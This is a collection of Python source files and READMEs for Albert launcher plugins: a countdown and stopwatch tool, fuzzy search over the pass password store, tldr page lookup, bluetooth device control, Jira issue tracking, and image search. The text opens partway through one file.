text="Create countdown",
subtext=f"{subtext_name} | {subtext_dur}",
completion=query.trigger,
actions=[
FuncAction(
"Create countdown",
lambda name=name, duration=duration: create_countdown(
name=name, duration=duration
),
)
],
),
v0.Item(
id=md_name,
icon=[stopwatch_path],
text="Create stopwatch",
subtext=subtext_name,
completion=query.trigger,
actions=[
FuncAction(
"Create stopwatch",
lambda name=name: create_stopwatch(name),
)
],
),
]
)
# cleanup watches that are done
to_remove = [watch for watch in all_watches if watch.to_remove()]
for watch in to_remove:
delete_item(watch)
except Exception: # user to report error
v0.critical(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[countdown_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep>"""Access UNIX Password Manager Items using fuzzy search."""
import os
import shutil
import subprocess
import sys
import traceback
from pathlib import Path
from typing import Sequence
import albert as v0
import gi
from fuzzywuzzy import process
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip # type: ignore
md_name = "Pass"
md_description = "Pass - UNIX Password Manager - fuzzy search"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/pass_rlded"
)
icon_path = os.path.join(os.path.dirname(__file__), "pass_rlded")
cache_path = Path(v0.cacheLocation()) / "pass_rlded"
config_path = Path(v0.configLocation()) / "pass_rlded"
data_path = Path(v0.dataLocation()) / "pass_rlded"
pass_dir = Path(
os.environ.get(
"PASSWORD_STORE_DIR", os.path.join(os.path.expanduser("~/.password-store/"))
)
)
# https://gist.github.com/bergercookie/d808bade22e62afbb2abe64fb1d20688
# For an updated version feel free to contact me.
pass_open_doc = shutil.which("pass_open_doc")
pass_open_doc_exts = [
".jpg",
".jpeg",
".pdf",
".png",
]
def pass_open_doc_compatible(path: Path) -> bool:
"""Determine if the given path can be opened via pass_open_doc."""
if not shutil.which("pass-open-doc"):
return False
return len(path.suffixes) >= 2 and path.suffixes[-2] in pass_open_doc_exts
# passwords cache -----------------------------------------------------------------------------
class PasswordsCacheManager:
def __init__(self, pass_dir: Path):
self.refresh = True
self._pass_dir = pass_dir
def _refresh_passwords(self) -> Sequence[Path]:
passwords = tuple(self._pass_dir.rglob("**/*.gpg"))
save_data("\n".join((str(p) for p in passwords)), "password_paths")
return passwords
def get_all_gpg_files(self) -> Sequence[Path]:
"""Get a list of all the ggp-encrypted files under the given dir."""
passwords: Sequence[Path]
if self.refresh is True or not data_exists("password_paths"):
passwords = self._refresh_passwords()
self.refresh = False
else:
passwords = tuple(Path(p) for p in load_data("password_paths"))
return passwords
passwords_cache = PasswordsCacheManager(pass_dir=pass_dir)
# plugin main functions -----------------------------------------------------------------------
def do_notify(msg: str, image=None):
app_name = "pass_rlded"
Notify.init(app_name)
image = image
n = Notify.Notification.new(app_name, msg, image)
n.show()
def generate_passwd_cmd(passwd_name: str) -> str:
return f"pass generate -c -f {passwd_name}"
def generate_passwd_cmd_li(passwd_name: str) -> Sequence[str]:
return f"pass generate -c -f {passwd_name}".split()
# supplementary functions ---------------------------------------------------------------------
def get_as_item(query, password_path: Path):
full_path_no_suffix = Path(f"{password_path.parent}/{password_path.stem}")
full_path_rel_root = full_path_no_suffix.relative_to(pass_dir)
full_path_rel_root_str = str(full_path_rel_root)
actions = [
ProcAction("Remove", ["pass", "rm", "--force", full_path_rel_root_str]),
ClipAction("Copy Full Path", str(password_path)),
ClipAction("Copy Password name", password_path.name),
ClipAction("Copy pass-compatible path", full_path_rel_root_str),
]
actions.insert(0, ProcAction("Edit", ["pass", "edit", full_path_rel_root_str]))
actions.insert(
0,
ProcAction("Copy", ["pass", "--clip", full_path_rel_root_str]),
)
if pass_open_doc_compatible(password_path):
actions.insert(
0,
FuncAction(
"Open document with pass-open-doc",
lambda p=str(password_path): subprocess.run(["pass-open-doc", p], check=True),
),
)
return v0.Item(
id=md_name,
icon=[icon_path],
text=f"{password_path.stem}",
subtext=full_path_rel_root_str,
completion=f"{query.trigger}{full_path_rel_root_str}",
actions=actions,
)
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title} :" + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name: str) -> Sequence[str]:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
return [s.strip() for s in f.readlines()]
def data_exists(data_name: str) -> bool:
return (config_path / data_name).is_file()
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
class ProcAction(v0.Action):
def __init__(self, name, args):
super().__init__(name, name, lambda: v0.runDetachedProcess(args))
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "pass "
def synopsis(self):
return "pass name"
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
results = []
try:
query_str = query.string.strip()
if len(query_str) == 0:
passwords_cache.refresh = True
results.append(
v0.Item(
id=md_name,
icon=[icon_path],
text="Continue typing to fuzzy-search on passwords...",
actions=[],
)
)
results.append(
v0.Item(
id=md_name,
icon=[icon_path],
text="Generate a new password...",
completion=f"{query.trigger}generate",
actions=[],
)
)
if query_str.startswith("generate"):
if len(query_str) > 1:
passwd_name = " ".join(query_str.split()[1:])
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Generate new password",
subtext=generate_passwd_cmd(passwd_name),
completion=f"{query.trigger}{query_str}",
actions=[
ProcAction(
"Generate new password",
generate_passwd_cmd_li(passwd_name=passwd_name),
)
],
),
)
else:
results.append(
v0.Item(
id=md_name,
icon=[icon_path],
text="What's the path of this new password?",
subtext="e.g., awesome-e-shop/<EMAIL>",
completion=f"{query.trigger} generate",
actions=[],
)
)
# get a list of all the paths under pass_dir
gpg_files = passwords_cache.get_all_gpg_files()
# fuzzy search on the paths list
matched = process.extract(query_str, gpg_files, limit=10)
for m in [elem[0] for elem in matched]:
results.append(get_as_item(query, m))
except Exception: # user to report error
print(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{sys.exc_info()}",
)
],
),
)
query.add(results)
<file_sep>"""TL;DR pages from albert."""
import re
import subprocess
import traceback
from pathlib import Path
from typing import Dict, Optional, Tuple
from fuzzywuzzy import process
import albert as v0
md_name = "TL;DR pages from albert."
md_description = "View tldr pages from inside albert"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins//tldr_pages"
)
icon_path = str(Path(__file__).parent / "tldr_pages")
cache_path = Path(v0.cacheLocation()) / "tldr_pages"
config_path = Path(v0.configLocation()) / "tldr_pages"
data_path = Path(v0.dataLocation()) / "tldr_pages"
tldr_root = cache_path / "tldr"
pages_root = tldr_root / "pages"
page_paths: Dict[str, Path] = {}
# Is the plugin run in development mode?
in_development = False
# plugin main functions -----------------------------------------------------------------------
def reindex_tldr_pages():
global page_paths
page_paths = get_page_paths()
# supplementary functions ---------------------------------------------------------------------
def update_tldr_db():
subprocess.check_call(f"git -C {tldr_root} pull --rebase origin master".split())
reindex_tldr_pages()
def get_page_paths() -> Dict[str, Path]:
global page_paths
paths = list(pages_root.rglob("*.md"))
return {p.stem: p for p in paths}
def get_cmd_as_item(query, pair: Tuple[str, Path]):
with open(pair[-1], "r") as f:
all_lines = f.readlines()
description_lines = [
li.lstrip("> ").rstrip().rstrip(".") for li in all_lines if li.startswith("> ")
]
# see if there's a line with more information and a URL
more_info_url = None
try:
more_info = [li for li in all_lines if "more information" in li.lower()][0]
more_info_url = re.search("<(.*)>", more_info)
if more_info_url is not None and more_info_url.groups():
more_info_url = more_info_url.groups()[0]
except IndexError:
pass
actions = [
ClipAction("Copy command", pair[0]),
UrlAction(
"Do a google search", f'https://www.google.com/search?q="{pair[0]}" command'
),
]
if more_info_url:
actions.append(UrlAction("More information", more_info_url))
return v0.Item(
id=md_name,
icon=[icon_path],
text=pair[0],
completion=" ".join([query.trigger, pair[0]]),
subtext=" ".join(description_lines),
actions=actions,
)
def get_cmd_sanitized(s: str) -> str:
return sanitize_string(s.strip("`").replace("{{", "").replace("}}", ""))
def get_cmd_items(pair: Tuple[str, Path]):
"""Return a list of Albert items - one per example."""
with open(pair[-1], "r") as f:
lines = [li.strip() for li in f.readlines()]
items = []
i = 0
if len(lines) < 2:
return items
while i < len(lines):
li = lines[i]
if not li.startswith("- "):
i += 1
continue
desc = li.lstrip("- ")[:-1]
# Support multine commands ------------------------------------------------------------
#
# find the start of the example - parse it differently if it's a single quote or if
# it's a multiline one
i += 2
example_line_start = lines[i]
if example_line_start.startswith("```"):
# multi-line string, find end
j = i + 1
while j < len(lines) and lines[j] != "```":
j += 1
continue
example_cmd = get_cmd_sanitized("\n".join(lines[i + 1 : j]))
i = j
else:
example_cmd = get_cmd_sanitized(lines[i])
items.append(
v0.Item(
id=md_name,
icon=[icon_path],
text=example_cmd,
subtext=desc,
actions=[
ClipAction("Copy command", example_cmd),
UrlAction(
"Do a google search",
f'https://www.google.com/search?q="{pair[0]}" command',
),
],
)
)
i += 1
return items
def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "tldr "
def synopsis(self):
return "some command"
def finalize(self):
pass
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
global page_paths
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
if not pages_root.is_dir():
subprocess.check_call(
f"git clone https://github.com/tldr-pages/tldr {tldr_root}".split()
)
reindex_tldr_pages()
def handleQuery(self, query) -> None:
results = []
try:
query_text = query.string.strip()
if not len(query_text):
results = [
v0.Item(
id=md_name,
icon=[icon_path],
text="Update tldr database",
actions=[FuncAction("Update", lambda: update_tldr_db())],
),
v0.Item(
id=md_name,
icon=[icon_path],
text="Reindex tldr pages",
actions=[FuncAction("Reindex", lambda: reindex_tldr_pages())],
),
v0.Item(
id=md_name,
icon=[icon_path],
text="Need at least 1 letter to offer suggestions",
actions=[],
),
]
query.add(results)
return
if query_text in page_paths.keys():
# exact match - show examples
results.extend(get_cmd_items((query_text, page_paths[query_text])))
else:
# fuzzy search based on word
matched = process.extract(query_text, page_paths.keys(), limit=20)
for m in [elem[0] for elem in matched]:
results.append(get_cmd_as_item(query, (m, page_paths[m])))
except Exception: # user to report error
v0.critical(traceback.format_exc())
if in_development:
raise
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep>"""Interact with the Linux bluetooth resources."""
import subprocess
import threading
import traceback
from pathlib import Path
from typing import List, Mapping, MutableMapping, Optional, Sequence
import gi
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import Notify
from albert import *
md_iid = "0.5"
md_version = "0.2"
md_name = "Bluetooth - Connect / Disconnect bluetooth devices"
md_description = "Connect / Disconnect bluetooth devices"
md_license = "BSD-2"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/bluetooth"
md_maintainers = "<NAME>"
md_bin_dependencies = ["rfkill", "bluetoothctl"]
icon_path = str(Path(__file__).parent / "bluetooth-orig.png")
icon_error_path = str(Path(__file__).parent / "bluetooth1.svg")
cache_path = Path(cacheLocation()) / "bluetooth"
config_path = Path(configLocation()) / "bluetooth"
data_path = Path(dataLocation()) / "bluetooth"
workers: List[threading.Thread] = []
class BlDevice:
"""Represent a single bluetooth device."""
def __init__(self, mac_address: str, name: str):
self.mac_address = mac_address
self.name = name
d = self._parse_info()
self.is_paired = d["Paired"] == "yes"
self.is_trusted = d["Trusted"] == "yes"
self.is_blocked = d["Blocked"] == "yes"
self.is_connected = d["Connected"] == "yes"
self.icon = d.get("Icon", icon_path)
def _parse_info(self) -> Mapping[str, str]:
proc = bl_cmd(["info", self.mac_address])
lines = [li.decode("utf-8").strip() for li in proc.stdout.splitlines()][1:]
d: MutableMapping[str, str] = {}
for li in lines:
try:
key, val = li.split(": ")
except ValueError:
# ill-formatted key
continue
d[key] = val
return d
def trust(self) -> None:
"""Trust a device."""
async_bl_cmd(["trust", self.mac_address])
def pair(self) -> None:
"""Pair with a device."""
async_bl_cmd(["pair", self.mac_address])
def connect(self) -> None:
"""Conect to a device."""
async_bl_cmd(["connect", self.mac_address])
def disconnect(self) -> None:
"""Disconnect an already connected device."""
async_bl_cmd(["disconnect", self.mac_address])
class ClipAction(Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: setClipboardText(copy_text))
class FuncAction(Action):
def __init__(self, name, command):
super().__init__(name, name, command)
class Plugin(QueryHandler):
def id(self):
return __name__
def name(self):
return md_name
def description(self):
return md_description
def initialize(self):
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def defaultTrigger(self):
return "bl "
def handleQuery(self, query):
if not query.isValid:
return
results = []
# join any previously launched threads
for i in range(len(workers)):
workers.pop(i).join(2)
try:
# List all available device
results.extend(self.get_device_as_item(dev) for dev in list_avail_devices())
# append items to turn on / off the wifi altogether
results.append(
self.get_shell_cmd_as_item(
text="Enable bluetooth",
command="rfkill unblock bluetooth",
)
)
results.append(
self.get_shell_cmd_as_item(
text="Disable bluetooth",
command="rfkill block bluetooth",
)
)
except Exception: # user to report error
critical(traceback.format_exc())
query.add(Item(
id=self.name(),
icon=icon_path,
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
def get_device_as_item(self, dev: BlDevice):
text = dev.name
subtext = (
f"pair: {dev.is_paired} | "
f"connect: {dev.is_connected} | "
f"trust: {dev.is_trusted} | "
f"mac: {dev.mac_address}"
)
actions = []
if dev.is_connected:
actions.append(FuncAction("Disconnect device", lambda dev=dev: dev.disconnect()))
else:
actions.append(FuncAction("Connect device", lambda dev=dev: dev.connect()))
if not dev.is_trusted:
actions.append(FuncAction("Trust device", lambda dev=dev: dev.trust()))
if not dev.is_paired:
actions.append(FuncAction("Pair device", lambda dev=dev: dev.pair()))
actions.append(ClipAction("Copy device's MAC address", dev.mac_address))
icon = lookup_icon(dev.icon) or icon_path
return Item(
id=self.name(),
icon=[icon],
text=text,
subtext=subtext,
completion=self.defaultTrigger(),
actions=actions,
)
def get_shell_cmd_as_item(self, *, text: str, command: str):
"""Return shell command as an item - ready to be appended to the items list and be rendered by Albert."""
subtext = ""
completion = self.defaultTrigger()
def run(command: str):
proc = subprocess.run(command.split(" "), capture_output=True, check=False)
if proc.returncode != 0:
stdout = proc.stdout.decode("utf-8").strip()
stderr = proc.stderr.decode("utf-8").strip()
notify(
msg=f"Error when executing {command}\n\nstdout: {stdout}\n\nstderr: {stderr}",
image=icon_error_path,
)
return Item(
id=self.name(),
icon=[icon_path],
text=text,
subtext=subtext,
completion=completion,
actions=[
FuncAction(text, lambda command=command: run(command=command)),
],
)
def notify(
msg: str,
app_name: str = md_name,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def async_bl_cmd(cmd: Sequence[str]):
"""
Run a bluetoothctl-wrapped command in the background.
Inform about the result using system nofications.
"""
def _async_bl_cmd():
info("Running async bluetoothctl command - {cmd}")
proc = bl_cmd(cmd=cmd)
if proc.returncode == 0:
notify(
msg=f"Command {cmd} exited successfully.",
)
else:
msg = f"Command {cmd} failed - " f"{proc.returncode}"
stdout = proc.stdout.decode("utf-8").strip()
stderr = proc.stderr.decode("utf-8").strip()
if stdout:
msg += f"\n\nSTDOUT:\n\n{proc.stdout}"
if stderr:
msg += f"\n\nSTDERR:\n\n{proc.stderr}"
notify(msg=msg, image=icon_error_path)
t = threading.Thread(target=_async_bl_cmd)
t.start()
workers.append(t)
# BlDevice class ------------------------------------------------------------------------------
def bl_cmd(cmd: Sequence[str], check: bool = False) -> subprocess.CompletedProcess:
"""Run a bluetoothctl-wrapped command."""
return subprocess.run(["bluetoothctl", *cmd], check=check, capture_output=True)
def _bl_devices_cmd(cmd: Sequence[str]) -> Sequence[BlDevice]:
"""Run a command via bluetoothct and parse assuming it returns a Device-per-line output."""
proc = bl_cmd(cmd)
lines = [li.decode("utf-8").strip() for li in proc.stdout.splitlines()]
bl_devices = []
for li in lines:
tokens = li.strip().split()
bl_devices.append(BlDevice(mac_address=tokens[1], name=tokens[2]))
return bl_devices
def list_paired_devices() -> Sequence[BlDevice]:
return _bl_devices_cmd(["paired-devices"])
def list_avail_devices() -> Sequence[BlDevice]:
return _bl_devices_cmd(["devices"])
# supplementary functions ---------------------------------------------------------------------
def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
def lookup_icon(icon_name: str) -> Optional[str]:
icons = list(Path(__file__).parent.glob("*.png"))
matching = [icon for icon in icons if icon_name in icon.name]
if matching:
return str(matching[0])
else:
return None
<file_sep># colors - Albert plugin
## Description
The current plugin can be used for the following
* Visualise the given color name / hex code. Additionally provides the hex code
in either 6 or 12 byte format as well as the corresponding RGB triplets
* Use fuzzy searching to give you matching colors to your search string or
given hex code
## Demo


## Installation instructions
* Install the colors library from pip: `pip3 install --user --upgrade colour`
Refer to the parent project for further instructions: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>""" Jira Issue Tracking."""
import os
import shutil
import subprocess
import traceback
from pathlib import Path
from typing import cast
from fuzzywuzzy import process
from jira import JIRA, resources
from jira.client import ResultList
import albert as v0
# initial configuration -----------------------------------------------------------------------
md_name = "Jira"
md_description = "Jira Issue Tracking"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/jira-albert-plugin"
__simplename__ = "jira"
md_bin_dependenciesa = []
icon_path = os.path.join(os.path.dirname(__file__), "jira_blue")
icon_path_br = os.path.join(os.path.dirname(__file__), "jira_bold_red")
icon_path_r = os.path.join(os.path.dirname(__file__), "jira_red")
icon_path_y = os.path.join(os.path.dirname(__file__), "jira_yellow")
icon_path_g = os.path.join(os.path.dirname(__file__), "jira_green")
icon_path_lg = os.path.join(os.path.dirname(__file__), "jira_light_green")
# plugin locations
cache_path = Path(v0.cacheLocation()) / __simplename__
config_path = Path(v0.configLocation()) / __simplename__
data_path = Path(v0.dataLocation()) / __simplename__
pass_path = Path().home() / ".password-store"
user_path = config_path / "user"
server_path = config_path / "server"
api_key_path = pass_path / "jira-albert-plugin" / "api-key.gpg"
max_results_to_request = 50
max_results_to_show = 5
fields_to_include = ["assignee", "issuetype", "priority", "project", "status", "summary"]
prio_to_icon = {
"Highest": icon_path_br,
"High": icon_path_r,
"Medium": icon_path_y,
"Low": icon_path_g,
"Lowest": icon_path_lg,
}
prio_to_text = {"Highest": "↑", "High": "↗", "Medium": "-", "Low": "↘", "Lowest": "↓"}
# supplementary functions ---------------------------------------------------------------------
def get_create_issue_page(server: str) -> str:
return server + "/secure/CreateIssue!default.jspa"
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
def load_api_key() -> str:
try:
ret = subprocess.run(
["gpg", "--decrypt", api_key_path],
timeout=2,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
api_key = ret.stdout.decode("utf-8").strip()
return api_key
except subprocess.TimeoutExpired as exc:
exc.output = "\n 'gpg --decrypt' was killed after timeout.\n"
raise
def setup(query) -> None:
if not shutil.which("pass"):
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text='"pass" is not installed.',
subtext='Please install and configure "pass" accordingly.',
actions=[UrlAction('Open "pass" website', "https://www.passwordstore.org/")],
)
)
return
# user
if not user_path.is_file():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Please specify your email address for JIRA",
subtext="Fill and press [ENTER]",
actions=[FuncAction("Save user", lambda: save_data(query.string, "user"))],
)
)
return
# jira server
if not server_path.is_file():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Please specify the JIRA server to connect to",
subtext="Fill and press [ENTER]",
actions=[
FuncAction("Save JIRA server", lambda: save_data(query.string, "server"))
],
)
)
return
# api_key
if not api_key_path.is_file():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Please add api_key",
subtext="Press to copy the command to run",
actions=[
ClipAction(
"Copy command",
(
"pass insert"
f" {api_key_path.relative_to(pass_path).parent / api_key_path.stem}"
),
)
],
)
)
return
def get_as_subtext_field(field, field_title=None):
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}:" + s
return s
def make_transition(jira, issue, a_transition_id):
print(f'Transitioning issue "{issue.fields.summary[:10]}" -> {a_transition_id}')
jira.transition_issue(issue, a_transition_id)
def get_as_item(issue: resources.Issue, jira):
field = get_as_subtext_field
# first action is default action
actions = [
UrlAction("Open in jira", f"{issue.permalink()}"),
ClipAction("Copy jira URL", f"{issue.permalink()}"),
]
# add an action for each one of the available transitions
curr_status = issue.fields.status.name
for a_transition in jira.transitions(issue):
if a_transition["name"] != curr_status:
actions.append(
FuncAction(
f'Mark as "{a_transition["name"]}"',
lambda a_transition_id=a_transition["id"]: make_transition(
jira, issue, a_transition_id
),
)
)
subtext = (
f"{field(issue.fields.assignee)}"
f"{field(issue.fields.status.name)}"
f"{field(issue.fields.issuetype.name)}"
f"{field(issue.fields.project.key, 'proj')}"
)
subtext += prio_to_text[issue.fields.priority.name]
return v0.Item(
id=f"{md_name}_{issue.fields.priority.name}",
icon=[prio_to_icon[issue.fields.priority.name]],
text=issue.fields.summary,
subtext=subtext,
actions=actions,
)
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "jira "
def synopsis(self):
return "ticket title/expr"
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
results = []
try:
results_setup = setup(query)
if results_setup:
return results_setup
# TODO Only send request if query ends with dot otherwise add an item to inform the
# user of this behavior accordingly
user = load_data("user")
server = load_data("server")
api_key = load_api_key()
# connect to JIRA
jira = JIRA(server=server, basic_auth=(user, api_key))
issues = cast(
ResultList,
jira.search_issues(
(
"assignee = currentUser() AND status != 'Done' AND status != 'Won\\'t"
" do' AND status != 'Resolved' AND status != 'Rejected'"
),
maxResults=max_results_to_request,
fields=",".join(fields_to_include),
json_result=False,
),
)
issues.sort(key=lambda issue: issue.fields.priority.id, reverse=False)
results.append(
v0.Item(
id=md_name,
icon=[icon_path],
text="Create new issue",
actions=[UrlAction("Create new issue", get_create_issue_page(server))],
)
)
if len(query.string.strip()) <= 2:
for issue in issues[:max_results_to_show]:
results.append(get_as_item(issue, jira))
else:
desc_to_issue = {issue.fields.summary: issue for issue in issues}
# do fuzzy search - show relevant issues
matched = process.extract(
query.string.strip(), list(desc_to_issue.keys()), limit=5
)
for m in [elem[0] for elem in matched]:
results.append(get_as_item(desc_to_issue[m], jira))
except Exception: # user to report error
v0.critical(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep># url_lookup - Albert plugin
## Description
## Demo

## Manual installation instructions
Requirements:
- Albert - [Installation instructions](https://albertlauncher.github.io/docs/installing/)
- Albert Python Interface: ``v0.4``
- Python version >= 3.5
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interesting in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># `Anki` - Albert plugin
## Description
`Anki` card generator: Generate Basic, Basic-Reverse and Cloze cards for [Anki](https://apps.ankiweb.net/)
## Demo
### Usage demo

### User Interface

## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
You need to have the [AnkiConnect](https://ankiweb.net/shared/info/2055492159)
plugin installed.
### Imports
You also need the following imports to work:
- `import httpx`
- `from fuzzywuzzy import process`
- `from gi.repository import GdkPixbuf, Notify`
- `from overrides import overrides`
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interesting
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
<file_sep>"""Image Search and Preview."""
import concurrent.futures
import importlib.util
import subprocess
import time
import traceback
from pathlib import Path
from typing import Iterator, List
import albert as v0
from gi.repository import GdkPixbuf, Notify
# load bing module - from the same directory as this file
dir_ = Path(__file__).absolute().parent
spec = importlib.util.spec_from_file_location("bing", dir_ / "bing.py")
if spec == None:
raise RuntimeError("Couldn't find bing.py in current dir.")
bing = importlib.util.module_from_spec(spec)
spec.loader.exec_module(bing) # type: ignore
BingImage = bing.BingImage # type: ignore
bing_search = bing.bing_search # type: ignore
md_name = "Image Search and Preview"
md_description = "TODO"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/image_search"
)
icon_path = str(Path(__file__).parent / "image_search")
cache_path = Path(v0.cacheLocation()) / "image_search"
config_path = Path(v0.configLocation()) / "image_search"
data_path = Path(v0.dataLocation()) / "image_search"
# clean up cached images on every startup
if cache_path.exists():
for img in cache_path.glob("*"):
img.unlink()
# Keystroke Monitor ---------------------------------------------------------------------------
class KeystrokeMonitor:
def __init__(self):
super(KeystrokeMonitor, self)
self.thres = 0.4 # s
self.prev_time = time.time()
self.curr_time = time.time()
def report(self):
self.prev_time = time.time()
self.curr_time = time.time()
self.report = self.report_after_first # type: ignore
def report_after_first(self):
# update prev, curr time
self.prev_time = self.curr_time
self.curr_time = time.time()
def triggered(self) -> bool:
return self.curr_time - self.prev_time > self.thres
def reset(self) -> None:
self.report = self.report_after_first # type: ignore
# Do not flood the web server with queries, otherwise it may block your IP.
keys_monitor = KeystrokeMonitor()
# supplementary functions ---------------------------------------------------------------------
def bing_search_set_download(query, limit) -> Iterator[BingImage]:
for img in bing_search(query=query, limit=limit):
img.download_dir = cache_path
yield img
def notify(
msg: str,
app_name: str = md_name,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
